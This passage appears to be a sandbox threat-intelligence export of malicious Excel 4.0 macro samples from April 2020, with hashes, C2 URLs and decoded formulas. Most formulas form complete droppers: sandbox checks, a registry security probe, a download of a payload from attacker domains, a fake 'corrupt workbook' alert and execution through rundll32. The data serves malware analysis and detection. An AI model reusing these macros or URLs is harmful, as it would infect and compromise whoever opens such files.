corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GdYOSiM2Ln\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5873a76d72be41f1101cad56de0d81f2cb87f4691646d5b5d7d4c6ba7e9354ec"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"5873a76d72be41f1101cad56de0d81f2cb87f4691646d5b5d7d4c6ba7e9354ec","filesize":206336,"md5":"f9c641d410bdd896a7e44bd4c7de4379","sha1":"f20001c3299636364f437a5db8aa3d5fd2501b32","sha256":"5873a76d72be41f1101cad56de0d81f2cb87f4691646d5b5d7d4c6ba7e9354ec","sha512":"1fd42d1d7d4e50acdfe5beb9bc31f1dbe6e10331201e05514b282f8a9d23607139d6dbec61633bfa7fb9f72d88a7cea4d970691b7f7cbeaa1dcfef6ac35d57a7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5873a76d72be41f1101cad56de0d81f2cb87f4691646d5b5d7d4c6ba7e9354ec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"a5C6FhS2az\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"58844cc586015ed3bdc3ff0ddd5c7460cbd2504eb7fc7555d09ccd2d402a3cde"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"58844cc586015ed3bdc3ff0ddd5c7460cbd2504eb7fc7555d09ccd2d402a3cde","filesize":221184,"md5":"46a6677998cf25fb0b7fcfe5f58eaa32","sha1":"dae5218b28aabd8a1e6ff9e94f4bfdeb245bf130","sha256":"58844cc586015ed3bdc3ff0ddd5c7460cbd2504eb7fc7555d09ccd2d402a3cde","sha512":"63bc25e70d2bedad45f0f74ecf519695d642a19e71b69d690f601f4a21a79a55d49d0684051d772e1a4e82691952d4343e7ee02b582e61cfcb47883badc40824","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"58844cc586015ed3bdc3ff0ddd5c7460cbd2504eb7fc7555d09ccd2d402a3cde.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sIaYuO45AF\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"588b040c0d99050438f3fd0e58de981240d9ff5f0cdcbf6c38c76be15fc2fd6a"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"588b040c0d99050438f3fd0e58de981240d9ff5f0cdcbf6c38c76be15fc2fd6a","filesize":185344,"md5":"ad47e34c6ed1d4bd8f2dea94901ea1df","sha1":"f757d5aba08f9daca7ce9dba6c00f20be8e7c5d0","sha256":"588b040c0d99050438f3fd0e58de981240d9ff5f0cdcbf6c38c76be15fc2fd6a","sha512":"c266243877896734cba4d3cd8831b22301202c4862c1084810b48847dc9ae4c995ccd9571c64afa389a34ca4e6afe26e771622d13dc15dff985d3d0c03ff17c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"588b040c0d99050438f3fd0e58de981240d9ff5f0cdcbf6c38c76be15fc2fd6a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"588d20f673ba6447f4754c97ebe2f0d142117eab4f535fdd4d437b0c1544d75d"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"588d20f673ba6447f4754c97ebe2f0d142117eab4f535fdd4d437b0c1544d75d","filesize":160768,"md5":"02e4e102fc82807d5a6635c83f5ef445","sha1":"2fd824f8490bf514e159e3f16eb4a0747b1564bd","sha256":"588d20f673ba6447f4754c97ebe2f0d142117eab4f535fdd4d437b0c1544d75d","sha512":"2ccce4595c89469f1d5dbabf5f80a16efbd4004a62eb2f78a8972994e47c56f372ef6eeec13bf16f451fc18829d915969d29ae65df03a48b07e4e295a257a507","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"588d20f673ba6447f4754c97ebe2f0d142117eab4f535fdd4d437b0c1544d75d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MgxoDzokew\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"588dd59d0d8ee4fd1245c2c873a6958132ef6782fe1476cc9116e2e66deabed3"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"588dd59d0d8ee4fd1245c2c873a6958132ef6782fe1476cc9116e2e66deabed3","filesize":247808,"md5":"def31adfc2dd901664b03673e48e5b49","sha1":"6f525d2aa1fc42f3882dfc5ee89e7205ff6ac680","sha256":"588dd59d0d8ee4fd1245c2c873a6958132ef6782fe1476cc9116e2e66deabed3","sha512":"a64691c7f074c577a58c52f7317bc55cd3db8958b3055aa212cf23837a41e70d24ba04570e11222637eb297d3a5a0f41201c99778a0805bacc9d59665ce2f494","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"588dd59d0d8ee4fd1245c2c873a6958132ef6782fe1476cc9116e2e66deabed3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$33C$7,R$22C$7,R$11C$7)\nSUM(R$74C$7,R$61C$7,R$48C$7)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"58a5a8f1196530a4eafc79c667e32f3f3b72a22312ddc27d02556bad253bdde0"},"analysis":{"reported":"2020-04-09T16:16:24Z","score":10},"files":[{"filename":"58a5a8f1196530a4eafc79c667e32f3f3b72a22312ddc27d02556bad253bdde0","filesize":214528,"md5":"f02c48d63a55561093eb7f9685d1eeaa","sha1":"e83b006054324b77b9c53f8c469489e92aa324f7","sha256":"58a5a8f1196530a4eafc79c667e32f3f3b72a22312ddc27d02556bad253bdde0","sha512":"3f5d874bc6a1455756c6d4490fb021121742998db0b1798f08aba60bde07ca5f51ab5ed7069ed0acd295d94e08cb22373153df9c7fb7156d4793fc9ee52fa87f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"58a5a8f1196530a4eafc79c667e32f3f3b72a22312ddc27d02556bad253bdde0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"s2iVQAtulG\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"58b8a655b1f8b1f37966dba8f25135838abdd46ef5e54eb0a5b697787b0cb68e"},"analysis":{"reported":"2020-04-09T16:16:25Z","score":10},"files":[{"filename":"58b8a655b1f8b1f37966dba8f25135838abdd46ef5e54eb0a5b697787b0cb68e","filesize":152576,"md5":"570678bfc0dbc983d28a0fa11a65a6ba","sha1":"9019c450ad96b70b8a0571f0f4cc498017ff27eb","sha256":"58b8a655b1f8b1f37966dba8f25135838abdd46ef5e54eb0a5b697787b0cb68e","sha512":"9f9d396d6ff26a598f4e36fe71acd687f291c0317bc374bb5d4967e158f6455cbf83237f217cf9208f7e82c0a500c28275a0356ec3a9003dd83462cd2078514d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"58b8a655b1f8b1f37966dba8f25135838abdd46ef5e54eb0a5b697787b0cb68e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i1VEhdEsTP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"58c7ae618d3a84c38775bb20b211e3fb71c9f106ec52ac87b7783919a885e0ca"},"analysis":{"reported":"2020-04-09T16:16:25Z","score":10},"files":[{"filename":"58c7ae618d3a84c38775bb20b211e3fb71c9f106ec52ac87b7783919a885e0ca","filesize":185344,"md5":"742f40cc23fbd7e5bdbfd04a397949a9","sha1":"269a7cb978920f5551fe7db7da58d8cef60f8364","sha256":"58c7ae618d3a84c38775bb20b211e3fb71c9f106ec52ac87b7783919a885e0ca","sha512":"5a11120b105a8b24dc2be53a699de438a883d00f5da08efc2981dbec73356190bacde409ce79b10a7f84e3d4130e2d5e77e31ed806ad33549560109e47b1d86f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"58c7ae618d3a84c38775bb20b211e3fb71c9f106ec52ac87b7783919a885e0ca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59106960a1f76c7b6f0b017e472664bf666ce91b96004a7ce9e124ade580eb25"},"analysis":{"reported":"2020-04-09T16:16:25Z","score":10},"files":[{"filename":"59106960a1f76c7b6f0b017e472664bf666ce91b96004a7ce9e124ade580eb25","filesize":167936,"md5":"0f98e6b65290965c3107cb92340147b9","sha1":"00b64eab961932eae713c1b5809d991d9068b323","sha256":"59106960a1f76c7b6f0b017e472664bf666ce91b96004a7ce9e124ade580eb25","sha512":"d16036af0dccaf9ea5132086dcf15f5e63d80279f06e9cd52bcf5e6159bba486bfca3d06b93be53d41638bdc28186d2eedce5af54820ffd2bcdb57d54328e00d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59106960a1f76c7b6f0b017e472664bf666ce91b96004a7ce9e124ade580eb25.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5o97YwcGP5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59126fa6392fc8e9da1c3213abd48ae877c33a0fbf4b11be58b9ffb17d9ba2be"},"analysis":{"reported":"2020-04-09T16:16:25Z","score":10},"files":[{"filename":"59126fa6392fc8e9da1c3213abd48ae877c33a0fbf4b11be58b9ffb17d9ba2be","filesize":212992,"md5":"60bfe66947c3837189a086981d3266e6","sha1":"3b156a308f3742e0a94254d0f78c2a988c790194","sha256":"59126fa6392fc8e9da1c3213abd48ae877c33a0fbf4b11be58b9ffb17d9ba2be","sha512":"3b889b084a283f382f28942b01b27f94694e5a70b48359157bce43efea72baed8a1cb9d6e239b8dead52134975ddb29e196f54c0d577c9b791261e27150f7add","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59126fa6392fc8e9da1c3213abd48ae877c33a0fbf4b11be58b9ffb17d9ba2be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"y7iLQbSEnh\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"591cc9d4442cab1b315b6856786ca59364d9053f26a88f726cdc2d725e40f4ce"},"analysis":{"reported":"2020-04-09T16:16:25Z","score":10},"files":[{"filename":"591cc9d4442cab1b315b6856786ca59364d9053f26a88f726cdc2d725e40f4ce","filesize":167936,"md5":"17921a9cd9393cd7b78a4ef42c2a7902","sha1":"00cf741bb95846977528ff72ad9dff71335659d8","sha256":"591cc9d4442cab1b315b6856786ca59364d9053f26a88f726cdc2d725e40f4ce","sha512":"cf1ce981d7c2498dac7a19f1aa4de7343231f906844bc4574bf2dae8953b9961aa69aaf618e391509aa838f60c0b7725127ecdd3f9c0d463a9a47c39c460b5c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"591cc9d4442cab1b315b6856786ca59364d9053f26a88f726cdc2d725e40f4ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0izZEVZr8N\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5921531051948205f7d7b60905173e406df679ca31ab5443c6d87ce1c265e548"},"analysis":{"reported":"2020-04-09T16:16:25Z","score":10},"files":[{"filename":"5921531051948205f7d7b60905173e406df679ca31ab5443c6d87ce1c265e548","filesize":226304,"md5":"55dea81c52ecaaf60a4eb1ad3c3de3a5","sha1":"64a937ec76e01afaf4f318ffb155f79fc5f40688","sha256":"5921531051948205f7d7b60905173e406df679ca31ab5443c6d87ce1c265e548","sha512":"c7064403b520a9c9936b5902bf9517180b05d779d8ea0f0d86da9bdc30f6b025f26cfb77f4ca5eddffc9275c777708ffd9eb2f44a1fdc1bdd2df943707768d56","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5921531051948205f7d7b60905173e406df679ca31ab5443c6d87ce1c265e548.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Z1z41KHZFa\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5924a7fbb14603baad062d0e69345e93f903a7085a7a1651816619a768e768e8"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"5924a7fbb14603baad062d0e69345e93f903a7085a7a1651816619a768e768e8","filesize":112128,"md5":"dbf67bd8824041cd7cc13c4e8323e533","sha1":"8a94dec692cb36e5541d8348915f796313e5f344","sha256":"5924a7fbb14603baad062d0e69345e93f903a7085a7a1651816619a768e768e8","sha512":"b647ad9016dcf09e4a0a3201f4d4e82d5fed3713bdc252e178963f76bae7601f82125db563ef38a626ae6935c99e69b63022aadd465a5c68a9de8da0b2bcbabf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5924a7fbb14603baad062d0e69345e93f903a7085a7a1651816619a768e768e8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59410c63ea1e52e86470db094106bdb1987fe85083ff732065159e9f36aa0803"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59410c63ea1e52e86470db094106bdb1987fe85083ff732065159e9f36aa0803","filesize":152576,"md5":"da69196aa421d65a0aaaa1bd5b08a733","sha1":"01eeedbc409e7968a6a395a5adf58e1e98d21d65","sha256":"59410c63ea1e52e86470db094106bdb1987fe85083ff732065159e9f36aa0803","sha512":"b9fef4b778fd9d1e59c2e0679a4a3c964bc1c93ed78f5406fb11bfb1aa6b4df466bf43d45db93b3ef31ef00c5275d34e7f1942efe7f99ea77406b8e3ceaedea1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59410c63ea1e52e86470db094106bdb1987fe85083ff732065159e9f36aa0803.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6DLij1XBkX\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"59604699a80f1f23cfeb65836c1bd4d8d8be37f9b576bf2e2bad949def5e2d19"},"analysis":{"reported":"2020-04-09T16:16:26Z","score":10},"files":[{"filename":"59604699a80f1f23cfeb65836c1bd4d8d8be37f9b576bf2e2bad949def5e2d19","filesize":185344,"md5":"3ee1f16895560dc1deb49c4485a8870c","sha1":"77d41ff6650f3a6ed276fc0d709d1840bde7c76c","sha256":"59604699a80f1f23cfeb65836c1bd4d8d8be37f9b576bf2e2bad949def5e2d19","sha512":"2e79362db446e0266fbfa660fe5fde9d3557312650f514a9189e6689dcef9cd84040cba07b43607ce71c4bf316c2323d3900a10754d4b4abe915b40ad9783095","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"59604699a80f1f23cfeb65836c1bd4d8d8be37f9b576bf2e2bad949def5e2d19.xls"}],"unpack_count":0,"error_count":0